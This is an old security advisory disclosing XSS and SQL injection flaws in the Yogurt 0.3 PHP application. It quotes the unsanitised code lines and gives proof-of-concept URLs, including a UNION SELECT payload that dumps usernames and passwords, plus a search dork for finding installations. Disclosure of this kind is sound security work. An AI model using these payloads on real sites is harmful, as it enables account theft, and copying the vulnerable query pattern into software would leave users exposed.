Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities

2009.06.15
Credit: br0ly
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79

Name : Yogurt Site : http://sourceforge.net/projects/yogurt/ Down : http://sourceforge.net/project/showfiles.php?group_id=112452&package_id=141123&release_id=297459 Dork : "Yogurt build" Found By : br0ly Made in : Brasil Contact : br0ly[dot]Code[at]gmail[dot]com Description: Bug : XSS In index.php: index.php:45: if(isset($_GET['msg'])) index.php:48: print("<center>". $_GET['msg'] . "</center>"); <-- XSS VUL BUG : SQL INJECTION system/writemessage.php:81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db) <-- SQLi Vul system/writemessage.php:82: or bug("Database error, please try again"); system/writemessage.php:83: $row = mysql_fetch_array($rs); In neither case was the method _GET filtered properly. Others .phps also contains the failures I'm posting the first one I found .. ^^ P0c: XSS : http://localhost/xscripts/yogurt/index.php?msg=<script>alert('br0ly')</script> First: Go to: http://localhost/yogurt/newuser.php, after register, just login and you can explore the sqli. SQLi : http://localhost/yogurt/system/writemessage.php?original=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8+from+users-- OBS: need register_globals=on;


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top